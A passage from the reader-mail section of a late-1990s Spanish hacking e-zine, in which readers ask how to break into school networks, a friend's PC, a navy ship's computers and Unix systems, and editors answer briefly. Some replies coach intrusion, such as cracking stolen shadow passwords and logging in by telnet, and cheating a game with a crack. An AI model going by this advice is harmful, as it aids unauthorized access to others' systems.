  7535.   pornografia infantil., etc
  7536.              
  7537.   asi que necesito saber como empiezo, que debo estudiar.
  7538.  
  7539.   espero que me contestes porque estare esperando tu rspuesta... se
  7540.   despide un amigo chileno Sergio Carcamo.
  7541.              
  7542.   PD: Es bueno la organizacion donde estas J.J.F hackers.... :-)
  7543.              
  7544.   por favor escribeme ya...
  7545.  
  7546.   <------>
  7547.  
  7548.   [ Pues lo de siempre, lee este ezine y todo lo que puedas. ]
  7549.  
  7550. <────────────────────────────────────────────────────────────────────────────>
  7551.  
  7552.   Date: Thu, 10 Sep 1998 12:06:27 GMT 
  7553.   From: "Japer,s.c." <pilatos@xxxxxxxxxxxxxx>     
  7554.   To: conde_vampiro@usa.net 
  7555.   Subject: Aprendiz de Hacker 
  7556.   
  7557.   Hola que pasha tio, te mande un mail pero no me contestaste y espero que 
  7558.   si lo hagas ahora a mi direccion nueva que es chenatiun@xxxxxxxxxxxxxx 
  7559.  
  7560.   <------>
  7561.  
  7562.   [ No se que mail te refieres ya que recibo muchos, ademas contestamos
  7563.     mediante el ezine. ]
  7564.  
  7565. <────────────────────────────────────────────────────────────────────────────>
  7566.  
  7567.   Date: Sun, 06 Sep 1998 15:09:28 GMT 
  7568.   From: "Aztech's Mail" <aztech@xxxxxxxxxxxxxx>     
  7569.   To: Desconocido 
  7570.   Subject: AYUDA 
  7571.   
  7572.   Que onda te leo en la revista, ya se que no dan clases particulares, pero 
  7573.   pues dices que cualquier duda que tengamos contigo mero, pues yo soy muy 
  7574.   obediente, mira estoy tratando un sistema AIX 3, no se si me puedas 
  7575.   ayudar? 
  7576.  
  7577.   Esto es lo que tengo, su escaneado de puertos, su fichero passwd, con 
  7578.   shadow, que lo saque mediante un bug del send mail, que puedo hacer para 
  7579.   entrar, no se, una sugerencia, con exploits que conoscas para este sistema 
  7580.   operativo o algo por el estilo. 
  7581.  
  7582.   De antemano gracias 
  7583.  
  7584.   AZTECH 
  7585.  
  7586.   <------>
  7587.  
  7588.   [ Pues ahora solo te queda averiguar los password y te conectas por telnet
  7589.     y asi empiezas, pero ante todo no inflinjas ningun daño al sistema, ya
  7590.     que entonces no eres un Hacker. ]
  7591.  
  7592. <────────────────────────────────────────────────────────────────────────────>
  7593.  
  7594.   Date: Fri, 04 Sep 1998 05:08:50 GMT 
  7595.   From: "KraKen ." <enter_logon@xxxxxxxxxxxxxx>     
  7596.   To: conde_vampiro@usa.net 
  7597.   Subject: Traduccion de boxes 
  7598.   
  7599.   Aupa tios!. Antes de nada, tengo q diciros que teneis una Web cojonuda. 
  7600.   Para ir al grano: podriais traducirme la Lunch Box?. Es que mi ingles 
  7601.   es penoso. Gracias de todas formas. 
  7602.   Ah!, otra cosa (es una hipotesis): si yo tuviera un amigo imbecil 
  7603.   perdido, y quisiera joderle, sabiendo que a una hora determinada va a 
  7604.   estar conectado podria de alguna manera meterme en su PC, aprovechando 
  7605.   eso de lo bidireccional de la conexion, o es una fantasmada de esas q 
  7606.   solo se ven en la tele?. Si se puede podriais decirme como? (repito que 
  7607.   es solo una hipotesis). 
  7608.   Gracias 
  7609.  
  7610.   <------>
  7611.  
  7612.   [ Thx pero por ahora nadie de - J.J.F. / Hackers Team - traduzira ese
  7613.     documento, si algun lector esta interesado pues que nos envie la
  7614.     traduccion. Para metodos de entrada leete bien este ezine. ]
  7615.  
  7616. <────────────────────────────────────────────────────────────────────────────>
  7617.  
  7618.   Date: Tue, 18 Aug 1998 07:52:44 GMT 
  7619.   From: PlaXiuS <plaxius@xxxxxxxxxxxxxx>     
  7620.   To: conde_vampiro@usa.net 
  7621.   Subject: Gracias!!! 
  7622.   
  7623.   Muchas Gracias Conde_Vampiro por tu apreciacion y tu opinion ... la 
  7624.   publicaremos en el numero 3 de Proyecto_R que se va a demorar un poquito 
  7625.   ya que tenemos unos articulos bastantes extensos que deseamos entregar.
  7626.   La verdad es bastante duro mantener un magazine en especial cuando los
  7627.   colaboradores brillan por su ausencia. Bueno ahi va mi PGP por si acaso.
  7628.   normalmente no la uso ya que no tengo nada que ocultar hee pero si
  7629.   tienes algo personal que contarnos ahi esta !!!! Quiero felicitarte por 
  7630.   el enfoque que le has dado a JJF , sobre el hacking como arte ya que no 
  7631.   incitan a la ilegalidad como otras E-Zine , ni al anarquismo y esas 
  7632.   cosas !!!! buen camino amio . 
  7633.  
  7634.   Saludos Terricolas !!!! 
  7635.  
  7636.   PlaXiuS 
  7637.  
  7638.   <------>
  7639.  
  7640.   [ Thx y muy interesante Proyecto R. Hasta la vista, compañero. ]
  7641.  
  7642. <────────────────────────────────────────────────────────────────────────────>
  7643.  
  7644.   Date: Sat, 31 Oct 1998 23:22:02 GMT
  7645.   From: leandro moises <leandro2000@xxxxxxxxxxxxxx>
  7646.   To: conde_vampiro@usa.net
  7647.  
  7648.   HOLA QUE TAL ACA LES ESCRIVO DESDE ARGENRINA Y LA VERDAD ME GUSTO
  7649.   MUCHO SU WEB ,BUENO VOY AL GRANO LA VERDAD UNOS DE LOS TEMAS QUE MAS 
  7650.   ME GUSTARIA SAVER Y ME INTERESASN SON EL PRHach y por su puesto en 
  7651.   segundo lugar todo ACERCA DEL HACK,CRACK.ETC 
  7652.   BUENO LA VERDAD ES QUE YA NO SE QUE HACER POR QUE ME HE VAJADO 
  7653.   CUALQUIER CLASE DE PROGRAMAS ,DOCUMENTO Y ESA CASAS Y LA VERDAD E 
  7654.   LEIDO PROBADO CON TODO SIN UN SIMPLE RESULTADO . BUENO DESDE ACA LES 
  7655.   PIDO PORFAVOR UN CONSEJO UNA AYUDA PARA PODER INTERIORIZXARME E HACER 
  7656.   ALGO UTIL MUCHAS GRACIAS Y ESTA NO EL APRIMERA VEZ QUE LOS VOY A JODER.
  7657.   SE LOS PROMETO
  7658.  
  7659.   5D2 
  7660.  
  7661.   <------>
  7662.  
  7663.   [ Pues primero lo mejor es aprender a escribir correctamente :)
  7664.     Nuestro consejo, es el de siempre, lee este ezine y todo lo que puedas
  7665.     con mucha atencion, investiga y saca tus propias conclusiones. ]
  7666.  
  7667. <────────────────────────────────────────────────────────────────────────────>
  7668.   
  7669.   Date: Sat, 31 Oct 1998 15:28:35 GMT
  7670.   From: Javier <jjavierr@xxxxxxxxxxxxxx>
  7671.   To: conde_vampiro@usa.net
  7672.   Subject: Hola!!! 
  7673.  
  7674.   Hola Conde Vampiro
  7675.   Quiseria que me mandaras unos manuales para hacker windows95 asi como para
  7676.   cambiar la fastidiosa pantalla al inicar windows.
  7677.   Por favor te lo agradecieria muchoá
  7678.  
  7679.   <------>
  7680.  
  7681.   [ Sorry, pero nosotros no enviamos nada, leer FAQ. Te recomiendo que leas 
  7682.     este numero, que seguro que te sorprendera con agrado. ]
  7683.  
  7684. <────────────────────────────────────────────────────────────────────────────>
  7685.  
  7686.   From: Nestor <nesertzen@xxxxxxxxxxxxxx>
  7687.   To: conde_vampiro@usa.net
  7688.   Subject: Hola 
  7689.  
  7690.   Hola conde
  7691.   que tal... soy un aprendiz de hacker....bueno a menos quiero serlo....
  7692.   me gusto mucho su pagina la J.J.J HACKERS TEAM, todavia no estoy a la
  7693.   altura como para estar en su team, pero me esforsare por seguir
  7694.   intenandolo... tengo una duda y espero que me pueda ayudar, que tengo que
  7695.   hacer con la Llave Publica PGP JJF, tengo que compilarla?, en que lenguaje?
  7696.   o solo la pongo en el espacio de password,me gustaria que me respondas... 
  7697.   tambien me gustaria ayudar a romper el algoritmo pero realemte no tengo ni
  7698.   idea de como hacerlo si me dan una idea lo intentare 
  7699.   gracias 
  7700.  
  7701.   Nestor 
  7702.  
  7703.   <------>
  7704.  
  7705.   [ Lo primero, escribe nuestro nombre correctamente. Para usar la llave PGP,
  7706.     necesitas el programa PGP, en la documentacion veras como se usa :)
  7707.     Supongo que te refieres al RC5, pues lee la seccion de
  7708.     NOTICIAS UNDERGROUND para mas informacion. ]
  7709.  
  7710. <────────────────────────────────────────────────────────────────────────────>
  7711.  
  7712.   Date: Thu, 29 Oct 1998 13:19:53 GMT
  7713.   From: Javier <jjavierr@xxxxxxxxxxxxxx>
  7714.   To: conde_vampiro@usa.net
  7715.   Subject: Hola!!!!!! ATTE Zero^CooL 
  7716.  
  7717.   Hola Conde Vampiro te mando un grato saludo.
  7718.   Como soy nuevo en lo de los hacker, quisiera que me dijeras ujnos prgramas
  7719.   que debe tener cualquier hacker pues no se mucho de esto te agradeciera
  7720.   que me dieras el nombre y si puedes la pagina de donde bajarlos.
  7721.  
  7722.   BYE.
  7723.  
  7724.   <------>
  7725.  
  7726.   [ Hombre, programas de hackers ahi mil, tambien depende de lo que hagas,
  7727.     lo mejor que puedes hacer es probar por ti mismo y asi decides cual te
  7728.     gusta mas. ]
  7729.  
  7730. <────────────────────────────────────────────────────────────────────────────>
  7731.  
  7732.   From: "LUIS S. GONZALEZ A." <gonzalezluis@xxxxxxxxxxxxxx>
  7733.   To: conde_vampiro@usa.net
  7734.   Subject: union 
  7735.  
  7736.   Iluestre CV.
  7737.   Deseo ser parte del y ayudar en lo posible para que este proyecto llegue 
  7738.   a su feliz y deseada culminacion. 
  7739.   Unidos venceremos. 
  7740.  
  7741.   <------>
  7742.  
  7743.   [ Pues para ser sincero no se a que proyecto te refieres. Si es al de RC5,
  7744.     pues adelante ;-) ]
  7745.  
  7746. <────────────────────────────────────────────────────────────────────────────>
  7747.  
  7748.   Date: Mon, 02 Nov 1998 14:48:09 GMT
  7749.   From: "LAUTARO TELLECHEA" <lautarotellechea@xxxxxxxxxxxxxx>
  7750.   To: jjf_team@usa.net
  7751.   Subject: Dear Amigos... 
  7752.  
  7753.   Que tal... se que es un poco ortodoxo pero bien, quiero felicitarlos por
  7754.   los numeros del e-zine, me los he bajado todos y bien... hay muchas 
  7755.   cosas de las cuales no entiendo un pomo pero otras me parecen muy 
  7756.   dulces... soy de Argentina y quisiera mandarles unas trampillas que he 
  7757.   descubierto para que la publiquen en su proximo e-zine... esta es 
  7758.   referente a como poder pasar por alto el menu logico de un telefono 
  7759.   semi-publico de este mi pais... bue... si les interesa la idea me 
  7760.   gustaria me den un breve OK ! para saber si estamos en linea... Ah ! 
  7761.   otra cosa, ando en busca de un buen GURU que se quiera hacer cargo de la 
  7762.   tutela de este aprendiz de Hacker, si alguien esta interesado en 
  7763.   transmitir algunos de sus conocimientos con este personaje que hoy les 
  7764.   escribe estaria muy very agradecido... 
  7765.  
  7766.   Un abrazo viejitos... 
  7767.  
  7768.   Lautaro (hombregenetica) 
  7769.  
  7770.   <------>
  7771.  
  7772.   [ Pues enviamos esos trucos, que te los ponemos encantados :)
  7773.     Nosotros no damos clases privadas, pero si algun lector esta interesado
  7774.     en darte clases, pues ya os pondremos en contacto. ]
  7775.  
  7776. <────────────────────────────────────────────────────────────────────────────>
  7777.  
  7778.   Date: Mon, 02 Nov 1998 05:05:14 GMT
  7779.   From: Dago@xxxxxxxxxxxxxx
  7780.   To: jjf_team@usa.net
  7781.   Subject: e-zine 
  7782.  
  7783.   hola soy de Argentina necesitaria por favor si me pueden enviar 
  7784.   las JJF de la numero seis en adelante ya que son muy dificiles de 
  7785.   conseguir y no tengo internet, pero si correo electronico, 
  7786.   me las podrias enviar por e-mail, muchas gracias 
  7787.   espero las revistas. 
  7788.  
  7789.   pdta: Enviame cualquier otro e-zine similar a las JJF (se que las 
  7790.   tienen) 
  7791.   mas que gracias 
  7792.   Dago 
  7793.  
  7794.   <------>
  7795.  
  7796.   [ Este es el numero 7, el ultimo que hemos sacado, y no enviamos nada.
  7797.     Muy gracioso, que te hace pensar que si no enviamos ni siquiera nuestro
  7798.     ezine, te vayamos a enviar otros ezines? ]
  7799.  
  7800. <────────────────────────────────────────────────────────────────────────────>
  7801.         
  7802.   Date: Fri, 30 Oct 1998 17:32:05 GMT
  7803.   From: "Alejandro Loureda" <aloureda@xxxxxxxxxxxxxx>
  7804.   To: jjf_team@usa.net
  7805.   Subject: QUE PASA!!!!!! 
  7806.  
  7807.   QUE PASA CON LOS VIRUS, QUE NO LOS PUEDO CARGAR, A VER SI ME DAIS UNA
  7808.   SOLUCION, NECESITO JODER A LA ARMADA ESPAñOLA, ESTOY HACIENDO LA PUTA 
  7809.   MILI Y !!MILAGRO!!! SOY EL ENCARGADO DE LOS ORDENADORES DE UNA 
  7810.   FRAGATA....... PERO EL ULTIMO ARRESTO ME LO PAGAN. A VER SI ME PODEIS 
  7811.   MANDAR ALGO FUERTE O RECOMENDARMELO LO NECESITO PARA DESCARGAR 
  7812.   ADRENALINA, COLABORAR CON LA PATRIA NO? ME TIENEN HASTA LOS HUEVOS 
  7813.  
  7814.   <------>
  7815.  
  7816.   [ Y como es que estas de encargado si ni siquiera puedes ejecutar un
  7817.     simple virus? Ademas siendo el admin deberias saber que no es correcto
  7818.     destrozar sistemas informaticos. ]
  7819.  
  7820. <────────────────────────────────────────────────────────────────────────────>
  7821.  
  7822.   Date: Fri, 30 Oct 1998 11:58:07 GMT
  7823.   From: "LAUTARO TELLECHEA" <lautarotellechea@xxxxxxxxxxxxxx>
  7824.   To: jjf_team@usa.net
  7825.   Subject: QUERIDOS FRIEND's 
  7826.  
  7827.   Que tal soy Lautaro... un pequeño aprendiz de hackers en Argentina, bien
  7828.   los molesto por lo siguiente, quisiera saber si existe la posibilidad de 
  7829.   que me envien algun programita o link para bajarlo que tenga la funcion 
  7830.   de encontrar la clave para acceder a computadoras conectadas a intranet 
  7831.   con la pc que yo trabajo... es decir, cuando abro el explorador de 
  7832.   windows quiero entrar a otras pc┤s via red las cuales tienen su clave de 
  7833.   acceso... esto no tiene niguna malicia solo es el hecho de hacerlo... 
  7834.   Bueno quedo a sus ordenes y muchas gracias... un abrazo 
  7835.  
  7836.   Lautaro 
  7837.  
  7838.   <------>
  7839.  
  7840.   [ Sorry, pero no enviamos nada, mira nuestro FAQ. Y para eso, lee bien este
  7841.     ezine :) ]
  7842.  
  7843. <────────────────────────────────────────────────────────────────────────────>
  7844.  
  7845.   Date: Thu, 29 Oct 1998 15:29:15 GMT
  7846.   From: Juvenal Medina V. <juvenal.medina@xxxxxxxxxxxxxx>
  7847.   Subject: Hola !!. 
  7848.  
  7849.   Hola. 
  7850.  
  7851.   Antes que nada, felicidades, su pagina es excelente, pero les escribo para 
  7852.   pedirles de Favor , si es posible me ense±en a ser Hacker, hace como 3
  7853.   semanas tuve problemas con uno, pero ya se calmo, y eso me hizo pensar que
  7854.   podria ser hacker con su ayuda, para defenderme de personas malas... 
  7855.  
  7856.   Gracias.. 
  7857.  
  7858.   Escriban Pronto 
  7859.  
  7860.   Juvenal 
  7861.  
  7862.   <------>
  7863.  
  7864.   [ Pues para eso esta este ezine, pero para defender de "malas personas" no
  7865.     necesitas ser un Hacker, simplemente debes tomar ciertas medidas de
  7866.     seguridad. ]
  7867.  
  7868. <────────────────────────────────────────────────────────────────────────────>
  7869.  
  7870.   Date: Thu, 29 Oct 1998 14:44:02 GMT
  7871.   From: eugenio fourt de lacruz <imagen@xxxxxxxxxxxxxx>
  7872.   To: jjf_team@usa.net
  7873.   Subject: aprendiz 
  7874.  
  7875.   Les escribo desde Chile. Estuve navegando en vuestro web y quede maravillado
  7876.   de saber de que todo lo que se habla de los hackers, es real. Estoy
  7877.   realmente muy interesado en aprender todo lo referente a los mecanismos de
  7878.   seguridad informatica. Estoy recien partiendo y me gustaria pedirles
  7879.   humildemente, si me pueden interiorizar mas del tema. Sobre todo, en la
  7880.   terminologia. Que es Hackear, Crackear, Phreaking, etc. Baje algunos
  7881.   programas y archivos de los que ustedes ofrecen. Me gustarφa saber usarlos,
  7882.   pero debo partir por el principio. Si me pueden instruir, aunque sea un
  7883.   simple barniz sobre el tema, se los agradeceria mucho. Aqui en Chile, hasta
  7884.   donde yo se, no se practica el Hacker (o como se diga). 
  7885.  
  7886.   Gracias por recibir la nota. 
  7887.  
  7888.   Eugenio. 
  7889.   imagen@xxxxxxxxxxxxxx 
  7890.  
  7891.   <------>
  7892.  
  7893.   [ Bueno en Chile se esta comenzado, acaso no conoces Proyecto R, el primer
  7894.     ezine underground chileno :) Pues para ello lee este ezine. ]
  7895.  
  7896. <────────────────────────────────────────────────────────────────────────────>
  7897.  
  7898.   Date: Sat, 24 Oct 1998 08:11:06 GMT
  7899.   From: "Arargon" <jpardinesf@xxxxxxxxxxxxxx>
  7900.   Subject: Holaz ;) 
  7901.  
  7902.   Me mola el rollo eszte, veo que sabeis. Oz mando ezte emilioz para que
  7903.   mireiz en mi peichz y la evalueiz, si no es mucho pedir, firmarz en mi
  7904.   librillo. Mi correo no es este, conque os pido que noz mandeis nada, para
  7905.   que no se entere ;)
  7906.   Mi emilio ez arargon_1@xxxxxxxxxxxxxx o uCaLu@xxxxxxxxxxxxxx okiz? hasta la
  7907.   proximaz.
  7908.  
  7909.   <------>
  7910.  
  7911.   [ Leete nuestro FAQ. ]
  7912.  
  7913. <────────────────────────────────────────────────────────────────────────────>
  7914.  
  7915.   From: "Arargon" <jpardinesf@xxxxxxxxxxxxxx>
  7916.   Subject: holaz ;) 
  7917.  
  7918.   Perdonar tios, antes no os he dado la peich XDDDDD. Soy la lexe, la peich
  7919.   es: http://come.to/pagina.de.BuSeS
  7920.  
  7921.   <------>
  7922.  
  7923.   [ Recibido :) ]
  7924.  
  7925. <────────────────────────────────────────────────────────────────────────────>
  7926.  
  7927.   Date: Wed, 04 Nov 1998 17:04:25 GMT
  7928.   From: "bk abarca" <wktnoo@xxxxxxxxxxxxxx>
  7929.   To: conde_vampiro@usa.net
  7930.   Subject: Subdito suyo. 
  7931.  
  7932.   Hola Sr.Conde
  7933.   Soy un joven de 20 años de Sn JosΘ,Costa Rica. 
  7934.   Estudio Diseño Grafico en mi paφs. 
  7935.   Deseo que usted me ayude a evacuar algunas dudas con 
  7936.   repecto a algunos terminos usados para denotar elementos 
  7937.   para el uso de hackers. 
  7938.   Espero que pueda ayudarme ya que me gustaria saber tanto 
  7939.   como usted, por eso lo escogφ a usted para que me expli 
  7940.   cara porque creo que es el que mßs sabe del grupo sin despreciar 
  7941.   a nadie. 
  7942.   Para no aburrirlo mßs,empiezo. 
  7943.   NOTA: Las cosas no tiene que explicarlas tanto ya que 
  7944.   mas o menos conozco de internet, chats, hardward y software, etc. 
  7945.   LA RESPUESTA PUEDE SER EN INGLES 
  7946.  
  7947.   - Que son SCRIPTS 
  7948.   scripts con respecto a obtener passwords y bloquear ordenadores. 
  7949.  
  7950.   - Que es un LAMER 
  7951.  
  7952.   - Que es el mundo UNIX 
  7953.   eso con respecto a cambiar mi verdadero nombre de usuario. 
  7954.  
  7955.   - Como hago los BOTS. 
  7956.  
  7957.   - Que es C 
  7958.  
  7959.   - Como hago para usar el programa TLO que sirve para hacer 
  7960.   llamadas al extranjero. 
  7961.  
  7962.   Espero de antemano me pueda ayudar. 
  7963.   Cuando quiera puede venir a mi pais y conocer,nada mas diga 
  7964.   ......................ya tiene hospedaje. 
  7965.  
  7966.   -GRACIAS- 
  7967.  
  7968.   <------>
  7969.  
  7970.   [ Como ya bien sabras no damos clases privadas y ni por asomo soy el
  7971.     mejor de - J.J.F. / Hackers Team -, leer FAQ. Tus respuestas seran 
  7972.     en español para que todos los lectores lo entiendan bien :)
  7973.  
  7974.     - Los script son ficheros que se escriben usando los comandos del
  7975.       sistema operativo para hacer operaciones mas rapidas. En unix
  7976.       tienes varios shell script's, en MS-DOS tiene los ".bat".
  7977.  
  7978.     - El termino "lamer", que es usando erroneamente por la mayoria, es para
  7979.       describir a una persona de estupido, no tiene nada que ver con las
  7980.       ganas de aprender y/o novato, lamer es un insulto.
  7981.  
  7982.     - Unix es un sistema operativo y no tiene nada que ver con cambiar de
  7983.       nombre de usuario.
  7984.  
  7985.     - Busca esa informacion por el cyberespacio. Generalmente estan hechos en
  7986.       C.
  7987.  
  7988.     - C, es un lenguaje de programacion.
  7989.  
  7990.     - No conozco ese programa que mencionas. ]
  7991.  
  7992. <────────────────────────────────────────────────────────────────────────────>
  7993.  
  7994.   Date: Thu, 05 Nov 1998 09:25:17 GMT
  7995.   From: "Profesional Hacker" <profesionalh@xxxxxxxxxxxxxx>
  7996.   To: jjf_team@usa.net
  7997.   Subject: Hacker!! 
  7998.  
  7999.   Salu2, quisiera unirme a su equipo de Hackers..... pero no se como, me
  8000.   dicen que baje un programa, pero me marca error!!! 
  8001.  
  8002.   He leido 3 de sus e-zine y me parecen fantasticos, tengo algo de 
  8003.   experiencia con UNIX..... 
  8004.  
  8005.   Espero respuesta Hackers.... 
  8006.  
  8007.   <------>
  8008.  
  8009.   [ Supongo que te refieres al JJF RC5 Crack Team, pues para unirte lee bien
  8010.     la seccion de NOTICIAS UNDERGROUND. Pues vas algo atrasado ya que este
  8011.     es el nunero 7 :) ]
  8012.  
  8013. <────────────────────────────────────────────────────────────────────────────>
  8014.  
  8015.   Date:  Sat, 07 Nov 1998 11:59:20 GMT
  8016.   From:  "Profesional Hacker" <profesionalh@xxxxxxxxxxxxxx>      
  8017.   To:  conde_vampiro@usa.net  
  8018.   Subject:  Hacker!!!  
  8019.  
  8020.   Quiero unirme a su grupo, pero no se como contribuir en el e-zine!!! 
  8021.  
  8022.   <------>
  8023.  
  8024.   [ Sorry, pero - J.J.F. / Hackers Team - es un grupo cerrado, pero si que
  8025.     puedes contribuir con el ezine, escribiendo sobre algo que te interese.
  8026.     Te recomiendo leer el FAQ. ]
  8027.  
  8028. <────────────────────────────────────────────────────────────────────────────>
  8029.  
  8030.   Date:  Mon, 09 Nov 1998 14:41:58 GMT
  8031.   From:  "osenk dest" <accord@xxxxxxxxxxxxxx>      
  8032.   To:  <"conde_vampiro@usa.net">  
  8033.  
  8034.   me han dicho que eres un maquina  y me quieroponer en contacto conmigo 
  8035.  
  8036.   <------>
  8037.  
  8038.   [ Bueno, para empezar no soy ningun maquina, simplemente una persona con
  8039.     ganas de conocer, y si quieres algo, pues escribe un mail en
  8040.     condiciones. ]
  8041.  
  8042. <────────────────────────────────────────────────────────────────────────────>
  8043.    
  8044.   From:  "carlos saavedra" <carlosaave@xxxxxxxxxxxxxx>      
  8045.   To:  conde_vampiro@usa.net  
  8046.   Subject:  pregunta  
  8047.  
  8048.   Hola conde vampiro, te escribo para decirte que estoy interesado en 
  8049.   aprender muchas cosas, sobre lo que ustedes hacen, me gustaria que me 
  8050.   dijeras que significan terminos como h/v/p, craking, hacking, phreaking, 
  8051.   para poder investigar sobre eso, y si tu me mandaras informacon te lo 
  8052.   agradeceria mucho, ya que estoy interesado en aprender alguna de estas 
  8053.   modalidades. 
  8054.  
  8055.   Me gustaria ser tu aprendiz para convertirme en un hacker, no para 
  8056.   causar destrosos, sino para aprender cosas que pocas personas saben y 
  8057.   para atacar paginas que atenten contra muchos principios, si me 
  8058.   respondieras te estaria muy agradecido, asi que por favor hazlo y estare 
  8059.   esperando tu mensaje. 
  8060.  
  8061.   <------>
  8062.  
  8063.   [ Te recomiendo leer nuestro FAQ y todos tus dudas seran contestadas. ]
  8064.  
  8065. <────────────────────────────────────────────────────────────────────────────>
  8066.    
  8067.   From:  manic_miner@xxxxxxxxxxxxxx      
  8068.   To:  jjf_team@usa.net  
  8069.   Subject:  Hola !  
  8070.  
  8071.   Estimados amigos de JJFHackersTeam ! 
  8072.  
  8073.   Me interesaria que me den su opinion de mi pagina, la direccion de esta es: 
  8074.   http://www.geocities.com/SiliconValley/Pines/4539/index.html 
  8075.  
  8076.   A todo esto, que saben de saqueadores y raregazz ?. 
  8077.  
  8078.   <------>
  8079.  
  8080.   [ Leete nuestro FAQ. Sobre saqueadores (SET) y Raregazz, pues que siguen
  8081.     trabajando como siempre y desde aqui les enviamos un saludo :) ]
  8082.  
  8083. <────────────────────────────────────────────────────────────────────────────>
  8084.  
  8085.   Date:  Sun, 08 Nov 1998 16:41:55 GMT  
  8086.   From:  "HACKCOL TROJANS" <hackcol_trojans@xxxxxxxxxxxxxx>      
  8087.   To:  jjf_team@usa.net  
  8088.   Subject:  Felicitaciones!!!!  
  8089.  
  8090.   Bueno primero quisiera felicitarlos por el exelente web y E-ZINE que 
  8091.   tienen... 
  8092.   Les escribo por que quiero que conozcan el grupo al que pertenesco, pues 
  8093.   quisiera que entablaramos una comunicaci≤n mßs continua para tener una 
  8094.   relacion como colegas; el grupo se llama (HACKCOL TROJANS)y somos un 
  8095.   grupo muy nuevo, y estamos muy interesados en relacionarnos con otros 
  8096.   grupos de hackers. nosotros somos de colombia.. 
  8097.  
  8098.   Quisiera pedirles unos consejitos para nuestro grupo ya que ustedes 
  8099.   llevan mas tiempo como grupo... 
  8100.  
  8101.   estamos en construccion de nuestro web, y quisieramos estar al dia con 
  8102.   todo lo relacionado con este gran mundo del hacker por ello les pido si 
  8103.   conocen algunas buenas listas de correo me digan ..... no importa si 
  8104.   estan en ingles. 
  8105.  
  8106.   Creo que una idea muy buena para todos los del hack y principalmente 
  8107.   para los grupos que ya estan establecidos seria crear una lista de 
  8108.   correo para que los grupos como JJF,hackcol trojans y muchos mßs 
  8109.   estuvieran en contacto y compartieramos mucha informacion valiosa; les 
  8110.   digo esto a ustedes pues deben conocer mßs grupos y si estan interesados 
  8111.   les diran para hacerlo realidad... 
  8112.   Les agradesco mucho por lo que hacen por todos los hackers del mundo 
  8113.   hispano pues creo que los E-ZINES les han sido de gran utilidad como lo 
  8114.   fue para los de hackcol trojans.... 
  8115.  
  8116.   espero este e-mail salga en el E-ZINE #7.. 
  8117.   GRACIAS... 
  8118.  
  8119.   chao. 
  8120.   ATT 
  8121.   <<<<<<<<<<<<<<<<<<<<<<<!!DaRk PoIsOn!!>>>>>>>>>>>>>>>>>>>>>>>>>>>> 
  8122.   ********************^^HACKCOL TROJANS^^*************************** 
  8123.  
  8124.   <------>
  8125.  
  8126.   [ Thx, nosotros ya tenemos un mailing list propio pero no esta enfocado a
  8127.     estos temas, te recomiendo el numero pasado en el cual mencionabamos
  8128.     un excelente mailing list en espa±ol. Si quieres estar en contacto basta 
  8129.     que escribas mail's o pases por el website. Un saludo 
  8130.     - J.J.F. / Hackers Team -. ]
  8131.  
  8132. <────────────────────────────────────────────────────────────────────────────>
  8133.  
  8134.   Date: Sun, 15 Nov 1998 17:34:10 GMT
  8135.   From: "Ezequiel Panza" <ezequielpanza@xxxxxxxxxxxxxx>
  8136.   Subject: Necesito su ayuda!!!
  8137.  
  8138.   Hola, Soy Conan de Argentina, esoy realmente interesado en saber de que
  8139.   manera puedo acceder a telenet, teniendo en cuenta que estoy en Argentina,
  8140.   no existe ningun local dialup para mi pero son embargo existe la
  8141.   posibilidad que pueda accesar a telenet por medio de algun tipo de terminal
  8142.   anexa a travez de la concexion de internet. Si es asi me gustaria que me
  8143.   dijeran de que manera lo puedo conseguir ya que luego de accesar a una
  8144.   terminal de estas, me es imposible conectarme a otra maquina desde la misma.
  8145.   Desde ya muchas gracias.
  8146.  
  8147.   La interrogante seria entonces: Como puedo tener acceso a telenet???
  8148.  
  8149.   <------>
  8150.  
  8151.   [ Has pensado en alguna forma de "realizar una llamada" al dialup aunque
  8152.     no sea local. En estos casos ahi que trabajar el aspecto phreak. ]
  8153.  
  8154. <────────────────────────────────────────────────────────────────────────────>
  8155.  
  8156.   From: "PaMaX" <pamax@xxxxxxxxxxxxxx>
  8157.   To: "Conde Vampiro"
  8158.   Subject: Unas preguntilas 
  8159.  
  8160.   Hola que tal....
  8161.   Su pagina es "La MeJoR", se los digo porque entre varias veces y porque me
  8162.   copa su e-zine.....
  8163.   Yo queria pedierte un favorcito.....En mi maquina tengo el Windows 98 (una
  8164.   mierda) pero sin el no puedo usar un toco de programas que necesito....
  8165.   Bue' aca van mis preguntas
  8166.   1) Como hago para hackear redes novell que trabajan en DOS..... Es la red
  8167.      del colegio....cada uno tiene una cuenta pero yo quiero entrar a la del
  8168.      profesor (supongamos que conozco el login pero no el password).
  8169.   2) Tambien queria saber como hackear una pagina de unos amigos mios (entrar
  8170.      y modificarla)
  8171.   3) Pensaras que soy un poco estupido pero Que es hacer telnet y como se usa
  8172.      ese programa.....
  8173.  
  8174.   P.D me gustaria que explicaras algo sobre hacking en windows, ya se que es
  8175.       una mierda pero es lo que usa la mayoria (de los usuarios comunes)
  8176.  
  8177.   PD hay alguna forma de obtener cuentas de internet hackeando a alguna
  8178.      persona en IRC
  8179.  
  8180.   Bueno espero que me contestes, nos vemos........byez.....
  8181.  
  8182.   <------>
  8183.  
  8184.   [ Para eso esta este ezine :) Por cierto, no envies cosas raras y basta
  8185.     que envies los mail's una vez. ]
  8186.  
  8187. <────────────────────────────────────────────────────────────────────────────>
  8188.  
  8189.   Date: Sat, 14 Nov 1998 19:15:50 GMT
  8190.   From: "bull150" <fishing247@xxxxxxxxxxxxxx>
  8191.   Subject: help!! 
  8192.  
  8193.   Hello i'm looking for a hacker ar a program to help me. I got a game called
  8194.   mplayer poker 1.0 on the net and i play a lot i need a program to go in and
  8195.   get my fake money to change had some but they changed upgraded or something
  8196.   to beta and they don't work anymore been looking all over and noone can
  8197.   help. Please send any info or something to me. If you can do it or have
  8198.   someone who can it is at www.mplayer.com thxs and please write back soon.
  8199.  
  8200.   <------>
  8201.  
  8202.   [ You should use a crack. ]
  8203.  
  8204. <────────────────────────────────────────────────────────────────────────────>
  8205.  
  8206.   Date: Sat, 14 Nov 1998 15:38:35 GMT
  8207.   From: "Heitor Filho" <hroriz@xxxxxxxxxxxxxx>
  8208.   To: jjf_team@usa.net
  8209.   Subject: help me 
  8210.  
  8211.   hi. im trying to get root access to a unix system. but i cant get the
  8212.   /etc/security/shadow file. how can i get it? 
  8213.  
  8214.   thanks for the attention 
  8215.  
  8216.   exp2222 
  8217.  
  8218.   <------>
  8219.  
  8220.   [ To obtain a copy of the shadow you must be root, but there are some tool
  8221.     you can use unless you aren't root to get it. I suggest that you use some
